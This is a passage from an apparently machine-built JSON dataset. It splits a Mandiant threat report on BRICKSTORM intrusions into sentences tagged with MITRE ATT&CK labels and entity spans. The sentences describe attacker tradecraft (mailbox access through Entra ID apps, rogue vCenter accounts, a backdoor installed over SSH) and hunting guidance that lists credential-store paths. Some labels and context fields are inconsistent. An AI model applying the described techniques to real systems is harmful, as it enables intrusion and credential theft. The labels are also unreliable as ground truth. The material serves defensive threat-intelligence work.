servers and any connections should be treated as suspicious.", "sentence_text": "Some examples of false positives could include VPN appliances using a known service account to connect to a domain controller in order to perform LDAP lookups and authenticated vulnerability scanners using a well-known service account.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s93-bc8e33", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 93, "context_before": "Some examples of false positives could include VPN appliances using a known service account to connect to a domain controller in order to perform LDAP lookups and authenticated vulnerability scanners using a well-known service account.", "sentence_text": "The UAL is stored on Windows Servers inside the directory Windows\\System32\\LogFiles\\Sum and can be parsed using open-source tools such as SumECmd .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s94-e4636c", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 94, "context_before": "The UAL is stored on Windows Servers inside the directory Windows\\System32\\LogFiles\\Sum and can be parsed using open-source tools such as SumECmd .", "sentence_text": "This log source records attempted authenticated connections to Windows systems and often retains artifacts going back much longer than typical Windows event logs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s95-a74137", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 95, "context_before": "This log source records attempted authenticated connections to Windows systems and often retains artifacts going back much longer than typical Windows event logs.", "sentence_text": "Note that this log source includes successful and unsuccessful logins, but is still useful to identify suspicious activity sourced from appliances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s96-daecbd", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 96, "context_before": "Note that this log source includes successful and unsuccessful logins, but is still useful to identify suspicious activity sourced from appliances.", "sentence_text": "Access to Credentials and Secrets Use the forensic capabilities of EDR tools to acquire Windows Shellbags artifacts from Windows workstations and servers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s97-6a23b3", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 97, "context_before": "Access to Credentials and Secrets Use the forensic capabilities of EDR tools to acquire Windows Shellbags artifacts from Windows workstations and servers.", "sentence_text": "Shellbags records folder paths that are browsed by a user with the Windows Explorer application.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s98-a02ccf", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 98, "context_before": "Shellbags records folder paths that are browsed by a user with the Windows Explorer application.", "sentence_text": "Use an open-source parser to extract the relevant data and look for patterns of activity that are suspicious:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s99-e5af39", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 99, "context_before": "Use an open-source parser to extract the relevant data and look for patterns of activity that are suspicious:", "sentence_text": "Access to folder paths where the initiating user is a service account, especially service accounts that are unfamiliar or rarely used File browsing activity sourced from servers that include a Windows Universal Naming Convention (UNC) path that points to a workstation (e.g., \\\\bobwin7.corp.local\\browsing\\path)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s100-2f5f99", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 100, "context_before": "Access to folder paths where the initiating user is a service account, especially service accounts that are unfamiliar or rarely used File browsing activity sourced from servers that include a Windows Universal Naming Convention (UNC) path that points to a workstation (e.g., \\\\bobwin7.corp.local\\browsing\\path)", "sentence_text": "Appdata locations used to store session tokens (e.g., Users\\\\.azure\\ )\nWindows credential vault ( %appdatalocal%\\Microsoft\\Credentials )\nData Protection API (DPAPI) keys ( %appdata%\\Microsoft\\Protect\\\\ )", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s101-c1c969", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 101, "context_before": "Appdata locations used to store session tokens (e.g., Users\\\\.azure\\ )\nWindows credential vault ( %appdatalocal%\\Microsoft\\Credentials )\nData Protection API (DPAPI) keys ( %appdata%\\Microsoft\\Protect\\\\ )", "sentence_text": "Access to M365 Mailboxes using Enterprise Application whitepaper to hunt for these techniques.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s102-a19dcf", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 102, "context_before": "Access to M365 Mailboxes using Enterprise Application whitepaper to hunt for these techniques.", "sentence_text": "Although the white paper specifically references APT29, these techniques have become widely used by many groups.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s103-3a48dd", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 103, "context_before": "Although the white paper specifically references APT29, these techniques have become widely used by many groups.", "sentence_text": "In multiple investigations the threat actor used a Microsoft Entra ID Enterprise Application with mail.read or full_access_as_app scopes to access mailboxes of key individuals in the victim organization.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1114", "name": "Email Collection" } ], "procedure": "Use Entra ID app to access mailboxes", "entities": [ { "text": "threat actor", "start": 31, "end": 43, "label": "ThreatActor" }, { "text": "Microsoft Entra ID Enterprise Application", "start": 51, "end": 92, "label": "MalwareTool" }, { "text": "mail.read", "start": 98, "end": 107, "label": "Action" }, { "text": "full_access_as_app", "start": 111, "end": 129, "label": "Action" }, { "text": "access mailboxes", "start": 140, "end": 156, "label": "Action" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s104-e4c8c1", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 104, "context_before": "In multiple investigations the threat actor used a Microsoft Entra ID Enterprise Application with mail.read or full_access_as_app scopes to access mailboxes of key individuals in the victim organization.", "sentence_text": "To hunt for this activity, we recommend a phased approach:\nEnumerate the Enterprise Applications and Application Registrations with graph permissions that can read all mail.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s105-9bba46", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 105, "context_before": "To hunt for this activity, we recommend a phased approach:\nEnumerate the Enterprise Applications and Application Registrations with graph permissions that can read all mail.", "sentence_text": "For each application, validate that there is at least one secret or certificate configured for it.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s106-708702", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 106, "context_before": "For each application, validate that there is at least one secret or certificate configured for it.", "sentence_text": "Record the Application (client) ID Conduct a free text search against the Unified Audit Log or the OfficeActivity table in Sentinel for the client IDs from step 2.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s107-4637be", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 107, "context_before": "Record the Application (client) ID Conduct a free text search against the Unified Audit Log or the OfficeActivity table in Sentinel for the client IDs from step 2.", "sentence_text": "This will return the mailitemsaccessed events that recorded the application accessing mail.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s108-c88d69", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 108, "context_before": "This will return the mailitemsaccessed events that recorded the application accessing mail.", "sentence_text": "For each application analyze the source IP addresses and user-agent strings for discrepancies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s109-28906c", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 109, "context_before": "For each application analyze the source IP addresses and user-agent strings for discrepancies.", "sentence_text": "Legitimate usage of the applications should occur from well-defined IP addresses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s110-1d0947", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 110, "context_before": "Legitimate usage of the applications should occur from well-defined IP addresses.", "sentence_text": "Additionally, look for focused interest in key personnel mailboxes across multiple days.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s111-583281", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 111, "context_before": "Additionally, look for focused interest in key personnel mailboxes across multiple days.", "sentence_text": "When accessing M365 and other internet-facing services the actor has used multiple commercial VPN and proxy providers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s112-716ddf", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 112, "context_before": "When accessing M365 and other internet-facing services the actor has used multiple commercial VPN and proxy providers.", "sentence_text": "There is also evidence to support that this actor has access to a purpose-built obfuscation network built from compromised small office/home office routers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s113-aa624f", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 113, "context_before": "There is also evidence to support that this actor has access to a purpose-built obfuscation network built from compromised small office/home office routers.", "sentence_text": "The exit nodes for commercial VPNs and obfuscation networks change rapidly and sharing atomic indicators for hunting purposes is unlikely to yield results.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s114-98fa7e", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 114, "context_before": "The exit nodes for commercial VPNs and obfuscation networks change rapidly and sharing atomic indicators for hunting purposes is unlikely to yield results.", "sentence_text": "Fetch mailitemsaccessed logs for those mailboxes for the last year or as long as retention allows.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s115-13376e", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 115, "context_before": "Fetch mailitemsaccessed logs for those mailboxes for the last year or as long as retention allows.", "sentence_text": "Analyze the SessionID values of the log events and look for IDs that span multiple IP addresses where the IP addresses are not in the user’s typical geographic location.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s116-e62105", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 116, "context_before": "Analyze the SessionID values of the log events and look for IDs that span multiple IP addresses where the IP addresses are not in the user’s typical geographic location.", "sentence_text": "The threat actor often used the VSPHERE.LOCAL\\Administrator account when cloning VMs and targeted VMs that would contain credentials such as password vaults and domain controllers.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "used the VSPHERE.LOCAL\\Administrator account when cloning VMs and targeted VMs containing credentials such as password vaults and domain controllers", "entities": [ { "text": "The threat actor", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "used the VSPHERE.LOCAL\\Administrator account", "start": 23, "end": 67, "label": "Action" }, { "text": "cloning VMs and targeted VMs that would contain credentials such as password vaults and domain controllers", "start": 73, "end": 179, "label": "Action" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s117-abafe0", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 117, "context_before": "The threat actor often used the VSPHERE.LOCAL\\Administrator account when cloning VMs and targeted VMs that would contain credentials such as password vaults and domain controllers.", "sentence_text": "Investigators should search vCenter VPXD logs for activity that matches the aforementioned criteria and confirm if the cloning activity was intended or not.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s118-5a96c2", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 118, "context_before": "Investigators should search vCenter VPXD logs for activity that matches the aforementioned criteria and confirm if the cloning activity was intended or not.", "sentence_text": "Creation of Local vCenter and ESXi Accounts BashShellAdministrators group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s119-c2e006", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 119, "context_before": "Creation of Local vCenter and ESXi Accounts BashShellAdministrators group.", "sentence_text": "The threat actor established an SSH connection from a compromised appliance to vCenter using the newly created account and installed the BRICKSTORM backdoor on vCenter.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" }, { "id": "T1505", "name": "Server Software Component" } ], "procedure": "The threat actor established an SSH connection to vCenter using a created account and installed the BRICKSTORM backdoor.", "entities": [ { "text": "The threat actor", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "established an SSH connection from a compromised appliance to vCenter using the newly created account and installed the BRICKSTORM backdoor on vCenter", "start": 17, "end": 167, "label": "Action" }, { "text": "BRICKSTORM", "start": 137, "end": 147, "label": "MalwareTool" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s120-d0fd83", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 120, "context_before": "The threat actor established an SSH connection from a compromised appliance to vCenter using the newly created account and installed the BRICKSTORM backdoor on vCenter.", "sentence_text": "Shortly after, the threat actor deleted the account.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s121-5f41a9", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 121, "context_before": "Shortly after, the threat actor deleted the account.", "sentence_text": "Investigators should review audit logs in /var/log/audit/sso-events/audit_events.log for the creation and deletion of local accounts and validate their purpose.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s122-6a4828", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 122, "context_before": "Investigators should review audit logs in /var/log/audit/sso-events/audit_events.log for the creation and deletion of local accounts and validate their purpose.", "sentence_text": "In one instance, the threat actor named the account with a similar naming convention as a local service account used for backups on vCenter.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Named an account to mimic a legitimate service account naming convention.", "entities": [ { "text": "threat actor", "start": 21, "end": 33, "label": "ThreatActor" }, { "text": "named the account", "start": 34, "end": 51, "label": "Action" }, { "text": "vCenter", "start": 132, "end": 139, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s123-9b573d", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 123, "context_before": "In one instance, the threat actor named the account with a similar naming convention as a local service account used for backups on vCenter.", "sentence_text": "2025-04-01T06:45:32 {\"user\":\"Administrator@VSPHERE.LOCAL\",\"client\":\"\",\"timestamp\":\"04/01/2025 06:45:32 GMT\",\"description\":\"Creating local person user '' with details ('','','','','@vsphere.local')\",\"eventSeverity\":\"INFO\",\"type\":\"com.vmware.sso.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s124-625270", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 124, "context_before": "2025-04-01T06:45:32 {\"user\":\"Administrator@VSPHERE.LOCAL\",\"client\":\"\",\"timestamp\":\"04/01/2025 06:45:32 GMT\",\"description\":\"Creating local person user '' with details ('','','','','@vsphere.local')\",\"eventSeverity\":\"INFO\",\"type\":\"com.vmware.sso.", "sentence_text": "PrincipalManagement\"} 2025-04-01T06:45:55 {\"user\":\"Administrator@VSPHERE.LOCAL\",\"client\":\"\",\"timestamp\":\"04/01/2025 06:45:55 GMT\",\"description\":\"Adding users '[{Name: , Domain: vsphere.local}]' to local group 'Administrators'\",\"eventSeverity\":\"INFO\",\"type\":\"com.vmware.sso.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s125-51e4fe", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 125, "context_before": "PrincipalManagement\"} 2025-04-01T06:45:55 {\"user\":\"Administrator@VSPHERE.LOCAL\",\"client\":\"\",\"timestamp\":\"04/01/2025 06:45:55 GMT\",\"description\":\"Adding users '[{Name: , Domain: vsphere.local}]' to local group 'Administrators'\",\"eventSeverity\":\"INFO\",\"type\":\"com.vmware.sso.", "sentence_text": "PrincipalManagement\"} 2025-04-01T06:46:23 {\"user\":\"Administrator@VSPHERE.LOCAL\",\"client\":\"\",\"timestamp\":\"04/01/2025 06:46:23 GMT\",\"description\":\"Updating local group 'SystemConfiguration.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s126-c5846a", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 126, "context_before": "PrincipalManagement\"} 2025-04-01T06:46:23 {\"user\":\"Administrator@VSPHERE.LOCAL\",\"client\":\"\",\"timestamp\":\"04/01/2025 06:46:23 GMT\",\"description\":\"Updating local group 'SystemConfiguration.", "sentence_text": "BashShellAdministrators' details ('Access bash shell and manage local users on nodes').\",\"eventSeverity\":\"INFO\",\"type\":\"com.vmware.sso.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s127-acc7c9", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 127, "context_before": "BashShellAdministrators' details ('Access bash shell and manage local users on nodes').\",\"eventSeverity\":\"INFO\",\"type\":\"com.vmware.sso.", "sentence_text": "PrincipalManagement\"} 2025-04-01T06:52:03 sshd[36952]: Postponed keyboard-interactive/pam for @vsphere.local from 2025-04-01T06:52:30 sudo: pam_unix(sudo:session): session opened for user root 2025-04-01T06:53:39 Creation of BRICKSTORM on vCenter 2025-04-01T06:56:18 sudo: pam_unix(sudo:session): session closed for user root 2025-04-01T06:56:25 sshd[36952]: pam_unix(sshd:session): session closed for user @vsphere.local 2025-04-01T06:56:57 {\"user\":\"Administrator@VSPHERE.LOCAL\",\"client\":\"\",\"timestamp\":\"04/01/2025 06:56:57 GMT\",\"description\":\"Removing principals '[{Name: , Domain: vsphere.local}]' from local group 'Administrators'\",\"eventSeverity\":\"INFO\",\"type\":\"com.vmware.sso.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s128-f3b3ae", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 128, "context_before": "PrincipalManagement\"} 2025-04-01T06:52:03 sshd[36952]: Postponed keyboard-interactive/pam for @vsphere.local from 2025-04-01T06:52:30 sudo: pam_unix(sudo:session): session opened for user root 2025-04-01T06:53:39 Creation of BRICKSTORM on vCenter 2025-04-01T06:56:18 sudo: pam_unix(sudo:session): session closed for user root 2025-04-01T06:56:25 sshd[36952]: pam_unix(sshd:session): session closed for user @vsphere.local 2025-04-01T06:56:57 {\"user\":\"Administrator@VSPHERE.LOCAL\",\"client\":\"\",\"timestamp\":\"04/01/2025 06:56:57 GMT\",\"description\":\"Removing principals '[{Name: , Domain: vsphere.local}]' from local group 'Administrators'\",\"eventSeverity\":\"INFO\",\"type\":\"com.vmware.sso.", "sentence_text": "PrincipalManagement\"} 2025-04-01T06:58:12 {\"user\":\"Administrator@VSPHERE.LOCAL\",\"client\":\"\",\"timestamp\":\"04/01/2025 06:58:12 GMT\",\"description\":\"Deleting principal ''\",\"eventSeverity\":\"INFO\",\"type\":\"com.vmware.sso.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s129-3d6c6a", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 129, "context_before": "PrincipalManagement\"} 2025-04-01T06:58:12 {\"user\":\"Administrator@VSPHERE.LOCAL\",\"client\":\"\",\"timestamp\":\"04/01/2025 06:58:12 GMT\",\"description\":\"Deleting principal ''\",\"eventSeverity\":\"INFO\",\"type\":\"com.vmware.sso.", "sentence_text": "PrincipalManagement\"} SSH Enablement on ESXi and vCenter For ESXi servers, monitoring should be set up for SSH logins using local accounts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s130-e5865d", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 130, "context_before": "PrincipalManagement\"} SSH Enablement on ESXi and vCenter For ESXi servers, monitoring should be set up for SSH logins using local accounts.", "sentence_text": "In most organizations it is relatively rare for legitimate direct access to the ESXi hosts over SSH.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s131-bd44a4", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 131, "context_before": "In most organizations it is relatively rare for legitimate direct access to the ESXi hosts over SSH.", "sentence_text": "In many cases the SSH server is disabled by default.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s132-e83c08", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 132, "context_before": "In many cases the SSH server is disabled by default.", "sentence_text": "Write rules to alert on log events when SSH is enabled for a vSphere platform appliance.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s133-6b2fed", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 133, "context_before": "Write rules to alert on log events when SSH is enabled for a vSphere platform appliance.", "sentence_text": "Rogue VMs\nOrganizations should review VMWare audit events that track the creation and deletion of new VMs, particularly using non-standard ISO images and Operating Systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s134-8b6d22", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 134, "context_before": "Rogue VMs\nOrganizations should review VMWare audit events that track the creation and deletion of new VMs, particularly using non-standard ISO images and Operating Systems.", "sentence_text": "Audit events record the threat actor downloading archived ISO images to the datastore volumes used by vSphere.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1530", "name": "Data from Cloud Storage" } ], "procedure": "Download ISO images to datastore", "entities": [ { "text": "threat actor", "start": 24, "end": 36, "label": "ThreatActor" }, { "text": "downloading archived ISO images", "start": 37, "end": 68, "label": "Action" }, { "text": "datastore volumes", "start": 76, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "vSphere", "start": 102, "end": 109, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s135-4ddd89", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 135, "context_before": "Audit events may also record the threat actor downloading archived ISO images to the datastore volumes used by vSphere.", "sentence_text": "Hardening Guidance\nIt is crucial to maintain an up-to-date inventory of appliances and other devices in the network that do not support the standard security tool stack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s136-e0924f", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 136, "context_before": "Hardening Guidance\nIt is crucial to maintain an up-to-date inventory of appliances and other devices in the network that do not support the standard security tool stack.", "sentence_text": "Internet access: Appliances should not have unrestricted access to the internet.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s137-dcd5d6", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 137, "context_before": "Internet access: Appliances should not have unrestricted access to the internet.", "sentence_text": "Work with your vendors or monitor your firewall logs to lock down internet access to only those domains or IP addresses that the appliance requires to function properly.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s138-bcd4e5", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 138, "context_before": "Work with your vendors or monitor your firewall logs to lock down internet access to only those domains or IP addresses that the appliance requires to function properly.", "sentence_text": "Internal network access: Appliances exposed to the internet should not have unrestricted access to internal IP address space.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s139-edcaf0", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 139, "context_before": "Internal network access: Appliances exposed to the internet should not have unrestricted access to internal IP address space.", "sentence_text": "The management interface of most appliances does not need to establish connections to internal IP addresses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s140-3a9570", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 140, "context_before": "The management interface of most appliances does not need to establish connections to internal IP addresses.", "sentence_text": "Work with the vendor to understand specific needsLDAP queries to verify user attributes for VPN logins.\npreviously published guidance to secure the vSphere platform from threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s141-09eb82", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 141, "context_before": "Work with the vendor to understand specific needsLDAP queries to verify user attributes for VPN logins.\npreviously published guidance to secure the vSphere platform from threat actors.", "sentence_text": "Organizations should assess and improve the isolation of any credential vaulting systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s142-e7e065", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 142, "context_before": "Organizations should assess and improve the isolation of any credential vaulting systems.", "sentence_text": "In many cases if a threat actor is able to gain access to the underlying Operating System, any protected secrets can be exposed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s143-3d5e0d", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 143, "context_before": "In many cases if a threat actor is able to gain access to the underlying Operating System, any protected secrets can be exposed.", "sentence_text": "Servers hosting credential vaulting applications should be considered Tier 0 systems and have strict access controls applied to them.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s144-aa5fae", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 144, "context_before": "Servers hosting credential vaulting applications should be considered Tier 0 systems and have strict access controls applied to them.", "sentence_text": "Outlook and Implications Recent intrusion operations tied to BRICKSTORM likely represent an array of objectives ranging from geopolitical espionage, access operations, and intellectual property (IP) theft to enable exploit development.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s145-0919c2", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 145, "context_before": "Outlook and Implications Recent intrusion operations tied to BRICKSTORM likely represent an array of objectives ranging from geopolitical espionage, access operations, and intellectual property (IP) theft to enable exploit development.", "sentence_text": "Based on evidence from recent investigations the targeting of the US legal space is primarily to gather information related to US national security and international trade.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s146-e0afc6", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 146, "context_before": "Based on evidence from recent investigations the targeting of the US legal space is primarily to gather information related to US national security and international trade.", "sentence_text": "Additionally, GTIG assesses with high confidence that the objective of BRICKSTORM targeting SaaS providers is to gain access to downstream customer environments or the data SaaS providers host on their customers' behalf.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s147-66139e", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 147, "context_before": "Additionally, GTIG assesses with high confidence that the objective of BRICKSTORM targeting SaaS providers is to gain access to downstream customer environments or the data SaaS providers host on their customers' behalf.", "sentence_text": "The targeting of technology companies presents an opportunity to conduct theft of valuable IP to further the development of zero-day exploits.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s148-db7d3f", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 148, "context_before": "The targeting of technology companies presents an opportunity to conduct theft of valuable IP to further the development of zero-day exploits.", "sentence_text": "Acknowledgements\nThis analysis would not have been possible without the assistance from across Google Threat Intelligence Group, Mandiant Consulting and FLARE.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s149-b4b99e", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 149, "context_before": "Acknowledgements\nThis analysis would not have been possible without the assistance from across Google Threat Intelligence Group, Mandiant Consulting and FLARE.", "sentence_text": "We would like to specifically thank Nick Simonian from GTIG Research and Discovery (RAD).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s150-201ad6", "source": "mandiant", "doc_id": 